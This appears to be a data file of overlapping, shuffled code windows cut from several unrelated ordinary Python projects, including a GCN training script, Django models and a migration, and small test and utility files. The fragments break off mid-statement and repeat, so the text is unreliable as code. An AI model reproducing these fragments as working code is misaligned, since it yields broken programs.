"flags.DEFINE_list('motif_embedding_hidden', [256], 'the hidden layer number of motif embedding') flags.DEFINE_list('integration_hidden', [], 'the hidden",
"for i in Tloss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") with open(\"Result\\\\Acc.csv\", mode='a') as f: for i",
"of motif features') flags.DEFINE_list('property_embedding_hidden', [256], 'the hidden layer number of property embedding') flags.DEFINE_list('motif_embedding_hidden',",
"layer number of motif embedding') flags.DEFINE_list('integration_hidden', [], 'the hidden layer number of integration')",
"feed_dict.update({placeholders['dropout']: FLAGS.dropout}) # Training step outs = sess.run([model.opt_op, model.loss, model.accuracy], feed_dict=feed_dict) train_acc.append(outs[2]) train_loss.append(outs[1])",
"= preprocess_features(features) motiffeatures = preprocess_features(motiffeatures) if FLAGS.model == 'gcn': support = [preprocess_adj(adj)] num_supports",
"# Print results print(\"Epoch:\", '%04d' % (epoch + 1), \"train_loss=\", \"{:.5f}\".format(outs[1]), \"train_acc=\", \"{:.5f}\".format(outs[2]),",
"method of embedding combination') # embeding_combination_method ---- \"Hadamard\", \"Summation\", \"Connection\" # batch_run use_batch",
"feed_dict_val = construct_feed_dict(features, support, labels, mask, motiffeatures, placeholders) outs_val = sess.run([model.loss, model.accuracy], feed_dict=feed_dict_val)",
"chebyshev_polynomials(adj, FLAGS.max_degree) num_supports = 1 + FLAGS.max_degree model_func = GCN elif FLAGS.model ==",
"degree.') flags.DEFINE_integer('motif_feature_dim', 6, 'the dim of motif features') flags.DEFINE_list('property_embedding_hidden', [256], 'the hidden layer",
"on embedding matrix.') flags.DEFINE_integer('early_stopping', 30, 'Tolerance for early stopping (# of epochs).') flags.DEFINE_integer('hidden1',",
"placeholders placeholders = { 'support': [tf.sparse_placeholder(tf.float32) for _ in range(num_supports)], 'features': tf.sparse_placeholder(tf.float32, shape=tf.constant(features[2],",
"str(FLAGS.motif_embedding_hidden), str(FLAGS.integration_hidden),\\ test_acc,test_cost, max(Tacc),test_duration,stop_epoch, train_time, np.mean(train_time_list), test_time)) with open(\"Result\\\\Loss.csv\", mode='a') as f: for",
"f.write(\"\\n\") for i in val_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in Tloss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\")",
"test_time = time.time() - test_starttime # Save with open(\"Result\\\\Train_log.csv\", mode='a') as f: f.write(\"{},{},{},{},{},{},{},{},{},{:.4f},{:.4f},(best={:.4f}),{:.4f},{},{:.6f},{:.6f},{:.6f}\\n\".\\",
"\"{:.5f}\".format(test_acc), \"time=\", \"{:.5f}\".format(test_duration)) print(\"Max test acc = {:.5f}\".format(max(Tacc))) test_time = time.time() - test_starttime",
"model_func = MLP elif FLAGS.model == 'MORE': support = [preprocess_adj(adj)] # Not used",
"flags.DEFINE_float('dropout', 0.5, 'Dropout rate (1 - keep probability).') flags.DEFINE_float('weight_decay', 5e-4, 'Weight for L2",
"'Maximum Chebyshev polynomial degree.') flags.DEFINE_integer('motif_feature_dim', 6, 'the dim of motif features') flags.DEFINE_list('property_embedding_hidden', [256],",
"for i in train_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in val_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for",
"\"time=\", \"{:.5f}\".format(time.time() - t)) train_time_list.append(time.time() - t) test_cost, test_acc, test_duration = evaluate(features, support,",
"for i in val_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in Tacc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") #",
"[tf.sparse_placeholder(tf.float32) for _ in range(num_supports)], 'features': tf.sparse_placeholder(tf.float32, shape=tf.constant(features[2], dtype=tf.int64)), 'motiffeatures': tf.sparse_placeholder(tf.float32, shape=tf.constant(motiffeatures[2], dtype=tf.int64)),",
"Tloss = [], [], [] # Train model train_starttime = time.time() train_time_list =",
"#-------------------------- import package --------------------------# from __future__ import division from __future__ import print_function import",
"mode_list[59] # 0-14, 15-29, 30-44, 45-59 print(mode) FLAGS.learning_rate = mode[0] FLAGS.epochs = mode[1]",
"t = time.time() stop_epoch = epoch + 1 # Construct feed dictionary feed_dict",
"0.003] le = [300, 500, 1000, 2000] mo = [\"Hadamard\", \"Summation\", \"Connection\"] la",
"[], 'the hidden layer number of integration') flags.DEFINE_string('embeding_combination_method', \"Hadamard\", 'the method of embedding",
"Print results print(\"Epoch:\", '%04d' % (epoch + 1), \"train_loss=\", \"{:.5f}\".format(outs[1]), \"train_acc=\", \"{:.5f}\".format(outs[2]), \"val_loss=\",",
"mo = [\"Hadamard\", \"Summation\", \"Connection\"] la = [32, 64, 128, 256, 512] mode_list",
"logging=True) # Initialize session sess = tf.Session() # Define model evaluation function def",
"[300, 500, 1000, 2000] mo = [\"Hadamard\", \"Summation\", \"Connection\"] la = [32, 64,",
"'dense', 'MORE' flags.DEFINE_float('learning_rate', 0.001, 'Initial learning rate.') flags.DEFINE_integer('epochs', 500, 'Number of epochs to",
"1), \"train_loss=\", \"{:.5f}\".format(outs[1]), \"train_acc=\", \"{:.5f}\".format(outs[2]), \"val_loss=\", \"{:.5f}\".format(cost), \"val_acc=\", \"{:.5f}\".format(acc), \"time=\", \"{:.5f}\".format(time.time() - t))",
"2020-01-10 # Function: Run training #-------------------------- import package --------------------------# from __future__ import division",
"integration') flags.DEFINE_string('embeding_combination_method', \"Hadamard\", 'the method of embedding combination') # embeding_combination_method ---- \"Hadamard\", \"Summation\",",
"'Dropout rate (1 - keep probability).') flags.DEFINE_float('weight_decay', 5e-4, 'Weight for L2 loss on",
"= [preprocess_adj(adj)] num_supports = 1 model_func = GCN elif FLAGS.model == 'gcn_cheby': support",
"test_mask, motiffeatures, placeholders) print(\"Test set results:\", \"cost=\", \"{:.5f}\".format(test_cost), \"accuracy=\", \"{:.5f}\".format(test_acc), \"time=\", \"{:.5f}\".format(test_duration)) print(\"Max",
"argument for model: ' + str(FLAGS.model)) # Define placeholders placeholders = { 'support':",
"f.write(\"\\n\") for i in val_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in Tacc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\")",
"num_supports = 1 model_func = MLP elif FLAGS.model == 'MORE': support = [preprocess_adj(adj)]",
"train_loss, val_loss, Tloss = [], [], [] # Train model train_starttime = time.time()",
"test_acc, test_duration = evaluate(features, support, y_test, test_mask, motiffeatures, placeholders) print(\"Test set results:\", \"cost=\",",
"# Load data adj, features, y_train, y_val, y_test, train_mask, val_mask, test_mask, motiffeatures =",
"FLAGS.dropout, FLAGS.embeding_combination_method,\\ str(FLAGS.property_embedding_hidden), str(FLAGS.motif_embedding_hidden), str(FLAGS.integration_hidden),\\ test_acc,test_cost, max(Tacc),test_duration,stop_epoch, train_time, np.mean(train_time_list), test_time)) with open(\"Result\\\\Loss.csv\", mode='a')",
"model_func = GCN elif FLAGS.model == 'gcn_cheby': support = chebyshev_polynomials(adj, FLAGS.max_degree) num_supports =",
"= construct_feed_dict(features, support, y_train, train_mask, motiffeatures, placeholders) feed_dict.update({placeholders['dropout']: FLAGS.dropout}) # Training step outs",
"Define placeholders placeholders = { 'support': [tf.sparse_placeholder(tf.float32) for _ in range(num_supports)], 'features': tf.sparse_placeholder(tf.float32,",
"for sparse dropout 'num_motif_features_nonzero': tf.placeholder(tf.int32) } # Create model model = model_func(placeholders, input_dim=features[2][1],"
] |
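#--------------------------- early-stopping sketch ---------------------------#
# The early-stopping test in the training loop above compares the newest
# validation cost against the mean of the previous FLAGS.early_stopping
# validation costs. A minimal, self-contained sketch of that rule; the
# `window` parameter name and the toy cost numbers are illustrative, not
# taken from the original script.
import numpy as np


def should_stop(cost_history, window):
    """Stop when the newest validation cost exceeds the mean of the
    previous `window` costs (the rule applied in the loop above)."""
    if len(cost_history) <= window:
        return False
    return cost_history[-1] > np.mean(cost_history[-(window + 1):-1])


# Toy check: costs fall, plateau, then tick up, triggering the stop.
costs = [0.9, 0.7, 0.6, 0.55, 0.54, 0.60]
print(should_stop(costs, window=3))  # True: 0.60 > mean(0.60, 0.55, 0.54)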
# Source repo: diegoaldarondo/dannce
"""Tests for locomotion.tasks.two_tap."""
import cluster.multi_gpu as multi_gpu
import functools
from absl.testing import absltest
import numpy as np
import os

DEMO_PATH = "../demo/markerless_mouse1"
CONFIG_PATH = "../tests/configs/dannce_mouse_config.yaml"
DANNCE_PATH = "../tests/configs/label3d_dannce.mat"


class MultiGpuTest(absltest.TestCase):
    def test_dannce_predict_help_message(self):
        os.system("dannce-predict-multi-gpu --help")

    def test_com_predict_help_message(self):
        os.system("com-predict-multi-gpu --help")

    def test_dannce_predict_batch_params(self):
        handler = multi_gpu.MultiGpuHandler(
            CONFIG_PATH,
            n_samples_per_gpu=100,
            verbose=False,
            test=True,
            dannce_file=DANNCE_PATH,
        )
        batch_params, _ = handler.submit_dannce_predict_multi_gpu()
        self.assertTrue(os.path.exists(handler.batch_param_file))
        self.assertTrue(len(batch_params) == 10)

    def test_com_predict_batch_params(self):
        handler = multi_gpu.MultiGpuHandler(
            CONFIG_PATH,
            n_samples_per_gpu=100,
            verbose=False,
            test=True,
            dannce_file=DANNCE_PATH,
        )
        batch_params, _ = handler.submit_com_predict_multi_gpu()
        self.assertTrue(os.path.exists(handler.batch_param_file))
        self.assertTrue(len(batch_params) == 180)

    def test_raises_error_if_no_dannce_file(self):
        with self.assertRaises(FileNotFoundError):
            handler = multi_gpu.MultiGpuHandler(
                CONFIG_PATH, n_samples_per_gpu=100, verbose=False, test=True
            )

    def test_dannce_predict_multi_gpu_cli(self):
        cmd = "dannce-predict-multi-gpu %s --test=True --verbose=False --dannce-file=%s" % (
            CONFIG_PATH,
            DANNCE_PATH,
        )
        os.system(cmd)

    def test_com_predict_multi_gpu_cli(self):
        cmd = "com-predict-multi-gpu %s --test=True --verbose=False --dannce-file=%s" % (
            CONFIG_PATH,
            DANNCE_PATH,
        )
        os.system(cmd)


if __name__ == "__main__":
    absltest.main()
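# The batch counts asserted above (10 and 180) come from splitting a fixed
# number of prediction samples into chunks of n_samples_per_gpu, one chunk
# per GPU job. A sketch of that arithmetic only: make_batch_params and the
# total sample counts (1000 and 18000, inferred from the asserted batch
# counts) are hypothetical illustrations, not the actual MultiGpuHandler
# internals.
import math


def make_batch_params(total_samples, n_samples_per_gpu):
    """Return one (start, size) parameter dict per GPU job."""
    n_batches = math.ceil(total_samples / n_samples_per_gpu)
    return [
        {"start_sample": i * n_samples_per_gpu,
         "max_num_samples": min(n_samples_per_gpu,
                                total_samples - i * n_samples_per_gpu)}
        for i in range(n_batches)
    ]


print(len(make_batch_params(1000, 100)))   # 10 batches, as in the dannce test
print(len(make_batch_params(18000, 100)))  # 180 batches, as in the com test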
from datetime import datetime
from twick.tweet import Tweet
import twick.settings as settings


class Response(object):
    def __init__(self, raw):
        self.raw = raw
        self.tweets = list(map(Tweet, raw["statuses"]))
        self.metadata = dict(raw["search_metadata"])
        self.timestamp = datetime.now()

    def to_row(self):
        return self.metadata
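# A hedged usage sketch for the Response wrapper above. The payload shape
# mirrors the Twitter search API ("statuses" plus "search_metadata"), but
# sample_payload below is a made-up illustration, not real API data.
sample_payload = {
    "statuses": [],  # each entry would be a raw tweet dict passed to Tweet()
    "search_metadata": {"query": "%23python", "count": 0},
}
response = Response(sample_payload)
print(response.metadata)   # {'query': '%23python', 'count': 0}
print(response.timestamp)  # datetime captured when the Response was built
print(response.to_row())   # to_row() simply returns the metadata dict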
# Generated by Django 2.1 on 2019-05-15 12:47

from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion


class Migration(migrations.Migration):

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('article_tag', '0001_initial'),
        ('articles', '0001_initial'),
    ]

    operations = [
        migrations.AddField(
            model_name='readingstats',
            name='user',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='favoritearticle',
            name='article',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='articles.Article'),
        ),
        migrations.AddField(
            model_name='favoritearticle',
            name='favorited_by',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='article',
            name='author',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, to_field='username'),
        ),
        migrations.AddField(
            model_name='article',
            name='tagList',
            field=models.ManyToManyField(related_name='articles', to='article_tag.ArticleTag'),
        ),
        migrations.AlterUniqueTogether(
            name='readingstats',
            unique_together={('article', 'user')},
        ),
    ]
"name='author', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, to_field='username'), ), migrations.AddField( model_name='article', name='tagList', field=models.ManyToManyField(related_name='articles', to='article_tag.ArticleTag'), ), migrations.AlterUniqueTogether( name='readingstats',",
"('articles', '0001_initial'), ] operations = [ migrations.AddField( model_name='readingstats', name='user', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AddField(",
"model_name='readingstats', name='user', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='favoritearticle', name='article', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='articles.Article'), ), migrations.AddField( model_name='favoritearticle',",
"migrations.AddField( model_name='favoritearticle', name='favorited_by', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='article', name='author', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, to_field='username'), ),",
"model_name='article', name='author', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, to_field='username'), ), migrations.AddField( model_name='article', name='tagList', field=models.ManyToManyField(related_name='articles', to='article_tag.ArticleTag'), ), migrations.AlterUniqueTogether(",
"migrations.AddField( model_name='readingstats', name='user', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='favoritearticle', name='article', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='articles.Article'), ), migrations.AddField(",
"# Generated by Django 2.1 on 2019-05-15 12:47 from django.conf import settings from",
"django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies =",
"django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('article_tag', '0001_initial'), ('articles',",
"12:47 from django.conf import settings from django.db import migrations, models import django.db.models.deletion class",
"[ migrations.AddField( model_name='readingstats', name='user', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='favoritearticle', name='article', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='articles.Article'), ),",
"field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='favoritearticle', name='article', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='articles.Article'), ), migrations.AddField( model_name='favoritearticle', name='favorited_by', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE,",
"= True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('article_tag', '0001_initial'), ('articles', '0001_initial'), ] operations =",
"[ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('article_tag', '0001_initial'), ('articles', '0001_initial'), ] operations = [ migrations.AddField( model_name='readingstats', name='user',",
"to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='favoritearticle', name='article', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='articles.Article'), ), migrations.AddField( model_name='favoritearticle', name='favorited_by', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),",
"Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('article_tag', '0001_initial'), ('articles', '0001_initial'), ]",
"model_name='favoritearticle', name='favorited_by', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='article', name='author', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, to_field='username'), ), migrations.AddField(",
"import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial =",
"migrations.AddField( model_name='favoritearticle', name='article', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='articles.Article'), ), migrations.AddField( model_name='favoritearticle', name='favorited_by', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AddField(",
"to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='article', name='author', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, to_field='username'), ), migrations.AddField( model_name='article', name='tagList', field=models.ManyToManyField(related_name='articles',",
"by Django 2.1 on 2019-05-15 12:47 from django.conf import settings from django.db import",
"Generated by Django 2.1 on 2019-05-15 12:47 from django.conf import settings from django.db",
"from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies",
"settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True",
"), migrations.AddField( model_name='favoritearticle', name='favorited_by', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='article', name='author', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, to_field='username'),",
"), migrations.AddField( model_name='article', name='author', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, to_field='username'), ), migrations.AddField( model_name='article', name='tagList', field=models.ManyToManyField(related_name='articles', to='article_tag.ArticleTag'),",
"'0001_initial'), ] operations = [ migrations.AddField( model_name='readingstats', name='user', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='favoritearticle',",
"field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='article', name='author', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, to_field='username'), ), migrations.AddField( model_name='article', name='tagList',",
"field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, to_field='username'), ), migrations.AddField( model_name='article', name='tagList', field=models.ManyToManyField(related_name='articles', to='article_tag.ArticleTag'), ), migrations.AlterUniqueTogether( name='readingstats', unique_together={('article',",
"migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL),",
"on 2019-05-15 12:47 from django.conf import settings from django.db import migrations, models import",
"models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('article_tag',",
"Django 2.1 on 2019-05-15 12:47 from django.conf import settings from django.db import migrations,"
]
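
De-duplicating the overlapping windows in the row above yields one complete Django 2.1 migration that wires the article app's models to the user model. Reassembled with only the line breaks reintroduced:

    # Generated by Django 2.1 on 2019-05-15 12:47

    from django.conf import settings
    from django.db import migrations, models
    import django.db.models.deletion


    class Migration(migrations.Migration):

        initial = True

        dependencies = [
            migrations.swappable_dependency(settings.AUTH_USER_MODEL),
            ('article_tag', '0001_initial'),
            ('articles', '0001_initial'),
        ]

        operations = [
            migrations.AddField(
                model_name='readingstats',
                name='user',
                field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
            ),
            migrations.AddField(
                model_name='favoritearticle',
                name='article',
                field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='articles.Article'),
            ),
            migrations.AddField(
                model_name='favoritearticle',
                name='favorited_by',
                field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
            ),
            migrations.AddField(
                model_name='article',
                name='author',
                field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, to_field='username'),
            ),
            migrations.AddField(
                model_name='article',
                name='tagList',
                field=models.ManyToManyField(related_name='articles', to='article_tag.ArticleTag'),
            ),
            migrations.AlterUniqueTogether(
                name='readingstats',
                unique_together={('article', 'user')},
            ),
        ]

The to_field='username' on article.author makes that foreign key reference usernames rather than primary keys, and the closing AlterUniqueTogether limits ReadingStats to one row per (article, user) pair.
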
[
"def __init__(self, payload): if isinstance(payload, str): self._payload = json.loads(payload) else: self._payload = payload",
"dict() def __init__(self, payload): if isinstance(payload, str): self._payload = json.loads(payload) else: self._payload =",
"payload): if isinstance(payload, str): self._payload = json.loads(payload) else: self._payload = payload def to_json(self):",
"isinstance(payload, str): self._payload = json.loads(payload) else: self._payload = payload def to_json(self): return json.dumps(self._payload)",
"__init__(self, payload): if isinstance(payload, str): self._payload = json.loads(payload) else: self._payload = payload def",
"= dict() def __init__(self, payload): if isinstance(payload, str): self._payload = json.loads(payload) else: self._payload",
"PayloadWrap: _payload = dict() def __init__(self, payload): if isinstance(payload, str): self._payload = json.loads(payload)",
"class PayloadWrap: _payload = dict() def __init__(self, payload): if isinstance(payload, str): self._payload =",
"import json class PayloadWrap: _payload = dict() def __init__(self, payload): if isinstance(payload, str):",
"json class PayloadWrap: _payload = dict() def __init__(self, payload): if isinstance(payload, str): self._payload",
"if isinstance(payload, str): self._payload = json.loads(payload) else: self._payload = payload def to_json(self): return",
"<filename>flask_toolkit/shared/payload_wrap.py import json class PayloadWrap: _payload = dict() def __init__(self, payload): if isinstance(payload,",
"_payload = dict() def __init__(self, payload): if isinstance(payload, str): self._payload = json.loads(payload) else:"
]
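
This row shingles flask_toolkit/shared/payload_wrap.py in full. Reassembled, with a comment added on the class-level default:

    import json


    class PayloadWrap:
        # Note: this shared class attribute is shadowed by the instance
        # attribute assigned in __init__, so the dict() here is dead weight.
        _payload = dict()

        def __init__(self, payload):
            # Accept either a JSON string or an already-parsed object.
            if isinstance(payload, str):
                self._payload = json.loads(payload)
            else:
                self._payload = payload

        def to_json(self):
            return json.dumps(self._payload)

Usage: PayloadWrap('{"a": 1}').to_json() round-trips back to a JSON string, while passing a dict skips the json.loads step.
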
[
"['name'] class Article(models.Model): name = models.CharField(maxlength=50) def __str__(self): return self.name class Meta: ordering",
"smelly = models.BooleanField(default=True) class Parrot(models.Model): state = models.CharField(maxlength=50) perch = models.ForeignKey(Perch, null=True) def",
"= models.CharField(maxlength=50) perch = models.ForeignKey(Perch, null=True) def __str__(self): return self.state class Meta: ordering",
"ordering = ['state'] class Link(models.Model): name = models.CharField(maxlength=50) def __str__(self): return self.name class",
"django.db import models from tagging.fields import TagField class Perch(models.Model): size = models.IntegerField() smelly",
"models.CharField(maxlength=50) perch = models.ForeignKey(Perch, null=True) def __str__(self): return self.state class Meta: ordering =",
"def __str__(self): return self.name class Meta: ordering = ['name'] class FormTest(models.Model): tags =",
"self.state class Meta: ordering = ['state'] class Link(models.Model): name = models.CharField(maxlength=50) def __str__(self):",
"__str__(self): return self.name class Meta: ordering = ['name'] class Article(models.Model): name = models.CharField(maxlength=50)",
"= ['state'] class Link(models.Model): name = models.CharField(maxlength=50) def __str__(self): return self.name class Meta:",
"Parrot(models.Model): state = models.CharField(maxlength=50) perch = models.ForeignKey(Perch, null=True) def __str__(self): return self.state class",
"__str__(self): return self.name class Meta: ordering = ['name'] class FormTest(models.Model): tags = TagField()",
"= models.CharField(maxlength=50) def __str__(self): return self.name class Meta: ordering = ['name'] class Article(models.Model):",
"null=True) def __str__(self): return self.state class Meta: ordering = ['state'] class Link(models.Model): name",
"TagField class Perch(models.Model): size = models.IntegerField() smelly = models.BooleanField(default=True) class Parrot(models.Model): state =",
"from django.db import models from tagging.fields import TagField class Perch(models.Model): size = models.IntegerField()",
"models from tagging.fields import TagField class Perch(models.Model): size = models.IntegerField() smelly = models.BooleanField(default=True)",
"from tagging.fields import TagField class Perch(models.Model): size = models.IntegerField() smelly = models.BooleanField(default=True) class",
"return self.state class Meta: ordering = ['state'] class Link(models.Model): name = models.CharField(maxlength=50) def",
"def __str__(self): return self.name class Meta: ordering = ['name'] class Article(models.Model): name =",
"perch = models.ForeignKey(Perch, null=True) def __str__(self): return self.state class Meta: ordering = ['state']",
"models.IntegerField() smelly = models.BooleanField(default=True) class Parrot(models.Model): state = models.CharField(maxlength=50) perch = models.ForeignKey(Perch, null=True)",
"self.name class Meta: ordering = ['name'] class Article(models.Model): name = models.CharField(maxlength=50) def __str__(self):",
"class Link(models.Model): name = models.CharField(maxlength=50) def __str__(self): return self.name class Meta: ordering =",
"Article(models.Model): name = models.CharField(maxlength=50) def __str__(self): return self.name class Meta: ordering = ['name']",
"class Perch(models.Model): size = models.IntegerField() smelly = models.BooleanField(default=True) class Parrot(models.Model): state = models.CharField(maxlength=50)",
"models.BooleanField(default=True) class Parrot(models.Model): state = models.CharField(maxlength=50) perch = models.ForeignKey(Perch, null=True) def __str__(self): return",
"['state'] class Link(models.Model): name = models.CharField(maxlength=50) def __str__(self): return self.name class Meta: ordering",
"= models.BooleanField(default=True) class Parrot(models.Model): state = models.CharField(maxlength=50) perch = models.ForeignKey(Perch, null=True) def __str__(self):",
"Perch(models.Model): size = models.IntegerField() smelly = models.BooleanField(default=True) class Parrot(models.Model): state = models.CharField(maxlength=50) perch",
"size = models.IntegerField() smelly = models.BooleanField(default=True) class Parrot(models.Model): state = models.CharField(maxlength=50) perch =",
"def __str__(self): return self.state class Meta: ordering = ['state'] class Link(models.Model): name =",
"= models.CharField(maxlength=50) def __str__(self): return self.name class Meta: ordering = ['name'] class FormTest(models.Model):",
"= models.IntegerField() smelly = models.BooleanField(default=True) class Parrot(models.Model): state = models.CharField(maxlength=50) perch = models.ForeignKey(Perch,",
"return self.name class Meta: ordering = ['name'] class Article(models.Model): name = models.CharField(maxlength=50) def",
"class Meta: ordering = ['name'] class Article(models.Model): name = models.CharField(maxlength=50) def __str__(self): return",
"import models from tagging.fields import TagField class Perch(models.Model): size = models.IntegerField() smelly =",
"tagging.fields import TagField class Perch(models.Model): size = models.IntegerField() smelly = models.BooleanField(default=True) class Parrot(models.Model):",
"__str__(self): return self.state class Meta: ordering = ['state'] class Link(models.Model): name = models.CharField(maxlength=50)",
"class Parrot(models.Model): state = models.CharField(maxlength=50) perch = models.ForeignKey(Perch, null=True) def __str__(self): return self.state",
"models.CharField(maxlength=50) def __str__(self): return self.name class Meta: ordering = ['name'] class Article(models.Model): name",
"= ['name'] class Article(models.Model): name = models.CharField(maxlength=50) def __str__(self): return self.name class Meta:",
"= models.ForeignKey(Perch, null=True) def __str__(self): return self.state class Meta: ordering = ['state'] class",
"class Meta: ordering = ['state'] class Link(models.Model): name = models.CharField(maxlength=50) def __str__(self): return",
"Meta: ordering = ['name'] class Article(models.Model): name = models.CharField(maxlength=50) def __str__(self): return self.name",
"models.CharField(maxlength=50) def __str__(self): return self.name class Meta: ordering = ['name'] class FormTest(models.Model): tags",
"Meta: ordering = ['state'] class Link(models.Model): name = models.CharField(maxlength=50) def __str__(self): return self.name",
"Link(models.Model): name = models.CharField(maxlength=50) def __str__(self): return self.name class Meta: ordering = ['name']",
"models.ForeignKey(Perch, null=True) def __str__(self): return self.state class Meta: ordering = ['state'] class Link(models.Model):",
"name = models.CharField(maxlength=50) def __str__(self): return self.name class Meta: ordering = ['name'] class",
"class Article(models.Model): name = models.CharField(maxlength=50) def __str__(self): return self.name class Meta: ordering =",
"state = models.CharField(maxlength=50) perch = models.ForeignKey(Perch, null=True) def __str__(self): return self.state class Meta:",
"ordering = ['name'] class Article(models.Model): name = models.CharField(maxlength=50) def __str__(self): return self.name class",
"import TagField class Perch(models.Model): size = models.IntegerField() smelly = models.BooleanField(default=True) class Parrot(models.Model): state"
]
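
The row above assembles into a django-tagging test models module; the maxlength keyword and the ForeignKey with no on_delete date it to pre-1.0 Django. A sketch of the same models in current Django spelling (max_length replaces maxlength, and SET_NULL is an assumed on_delete for the nullable perch foreign key):

    from django.db import models
    from tagging.fields import TagField


    class Perch(models.Model):
        size = models.IntegerField()
        smelly = models.BooleanField(default=True)


    class Parrot(models.Model):
        state = models.CharField(max_length=50)
        # Assumption: SET_NULL preserves the original null=True behaviour.
        perch = models.ForeignKey(Perch, null=True, on_delete=models.SET_NULL)

        def __str__(self):
            return self.state

        class Meta:
            ordering = ['state']


    class Link(models.Model):
        name = models.CharField(max_length=50)

        def __str__(self):
            return self.name

        class Meta:
            ordering = ['name']


    class Article(models.Model):
        name = models.CharField(max_length=50)

        def __str__(self):
            return self.name

        class Meta:
            ordering = ['name']


    class FormTest(models.Model):
        tags = TagField()
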
[
"'edge' in filename: if len(v_list) != 2 and len(v_list) != 3: print '(invalid)",
"import sys def validate(filename): n_max = -1 v_set = set() with open(filename) as",
"% n_line return if len(v_list) == 3: v_list = v_list[: 2] for vid",
"'vertex ids are not continuous, lost %d id.' % (n_max - len(v_set) if",
"v_set else n_max - len(v_set) + 1) def main(): if len(sys.argv) != 2:",
"id.' % (n_max - len(v_set) if 0 in v_set else n_max - len(v_set)",
"== n_max + 1 and 0 in v_set: print '(valid) start index: 0,",
"sys def validate(filename): n_max = -1 v_set = set() with open(filename) as fin:",
"filename: if len(v_list) < 2: print '(invalid) at line %d' % n_line return",
"%d vertex.' % (n_max, len(v_set)) else: print '(valid) start index: 0, max vertex",
